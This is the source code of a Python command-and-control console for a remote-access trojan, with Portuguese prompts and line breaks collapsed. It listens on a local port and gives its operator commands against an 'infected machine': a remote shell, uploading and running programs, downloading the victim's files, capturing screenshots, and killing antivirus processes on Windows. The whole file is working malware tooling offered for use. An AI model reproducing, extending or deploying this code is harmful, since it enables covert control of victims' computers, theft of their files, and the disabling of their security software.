#!/bin/bash/env python import os, datetime, time, socket, subprocess, sys from hashlib import sha1 as sha BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m' def help(): print('{0}Comandos{1}:\n{2}upload{3} - Escolha um arquivo para fazer upload na maquina infectada.'.format(YELLOW, END, RED, END)) print('{0}shell{1} - Para obter uma shell na maquina do cliente.'.format(RED, END)) print('{0}execute{1} - Executa um programa na maquina infectada.\n Ex: execute payload.exe'.format(RED, END)) print('{0}download{1} - Faz o download de um arquivo na maquina infectada para sua maquina.\n Ex: download foto.png'.format(RED, END)) print('{0}screenshot{1} - tira um screenshot da tela do infectado e salva no seu desktop.'.format(RED, END)) print('{0}killav{1} - Mata o processo de antivirus na maquina do infectado. Apenas funciona no Windows'.format(RED, END)) print('{0}clear{1} - Limpa a tela.'.format(RED, END)) print('{0}exit{1} - Sai do programa.'.format(RED, END)) def execute(s, program_name): if(len(program_name.split(' ')) == 1): try: program_name = input('Digite o nome do programa: ') except KeyboardInterrupt: return else: file = program_name.split(' ') file.remove('execute') program_name = ' '.join(file) s.send('6') s.send(program_name) ret = s.recv(1) if(ret == '1'): print('Arquivo não existe') elif(ret == '0'): print('Executando') def upload(s, filepath=False): if(not filepath): command = subprocess.Popen('zenity --file-selection --title choose a file', shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) ret = command.stdout.read() filename = os.path.basename(ret) ret = ret.replace('\n','') arq_path = ret.replace(" ", r"\ ").replace(" (", r" \("). replace(")", r"\)") if(os.path.isfile(ret)): s.send('1') # upload print('Enviando arquivo: '+ filename) try: f = open(arq_path, 'rb') except IOError: f = open(ret, 'rb') ler = f.read(1024) l = str(filename) + '+/-' + ler while(l): s.send(l) l = f.read(1024) f.close() print('Envio completo ...') s.shutdown(socket.SHUT_WR) else: print('Arquivo inválido ou não é arquivo') return else: pass def download(s, desktop_path): desktop_path = os.path.expanduser('~')+'/Desktop/' path2 = os.path.expanduser('~') + r'/Área\ de\ Trabalho/' if(os.path.isdir(desktop_path)): right_path = desktop_path elif(os.path.isdir(path2)): right_path = path2 if(len(desktop_path.split(' ')) == 1): try: filename = input('Nome do arquivo: ') except KeyboardInterrupt: return else: filename = desktop_path.split(' ') filename.remove('download') filename = ' '.join(filename) s.send('3') s.send(filename) exists = s.recv(1024) if(exists.split('+/-')[0]=='True'): f = open(right_path + filename, 'wb') j = exists.split('+/-')[1] l = s.recv(1024) l = j + l while(l): f.write(l) l = s.recv(1024) f.close() print('Baixado') else: print('Arquivo ' + filename +' não existe.') def screenshot(s): s.send('5') retorno = s.recv(1024) if(retorno): nome = retorno.split('+/-')[0] nome = nome.replace('/tmp/', os.path.expanduser('~')+'/Desktop/') f = open(nome , 'wb') l = retorno.split('+/-')[1] while(l): f.write(l) l = s.recv(1024) f.close() print('Screenshot salvo na sua area de trabalho') else: raise socket.error def killav(s): s.send('4') def shell(s): s.send('2') # shell while True: try: executar = input('\33[93m~$ \033[0m') s.send(executar) if(executar == 'exit'): break retorno = s.recv(500000) if(not retorno): print('maquina desconectada, reconectando ...') connect('127.0.0.1', 1025) else: print(retorno) except KeyboardInterrupt: break def parser(comand, s): command = comand.split(' ')[0] if(command == 'upload'): upload(s) elif(command == 'shell'): shell(s) elif(command == 'download'): download(s, comand) elif(command == 'screenshot'): screenshot(s) elif(command == 'execute'): execute(s, comand) elif(command=='killav'): killav(s) elif(command == 'help' or command == 'ajuda'): help() elif(command == 'clear'): os.system('clear') elif(command == 'exit'): sys.exit('Você escolheu sair') else: print('{0}Comando errado, digite {1}HELP{2} para obter ajuda dos comandos'.format(END, RED, END)) return def connect(ip, port): send = False while True: socket_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM) socket_obj.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) socket_obj.bind((ip, port)) socket_obj.listen(1) if(not send): print('{0}[+] Aguardando conexões...'.format(GREEN)) try: connection, address = socket_obj.accept() except KeyboardInterrupt: exit() retrn = connection.recv(1024) if(send == False): print(retrn) while True: try: try: command = input('\033[0m-> ') except KeyboardInterrupt: sys.exit() parser(command, connection) except socket.error as e: # socket.shutdown(socket.SHUT_WR) print(str(e)) send = True break if __name__ == '__main__': connect('127.0.0.1', 1025)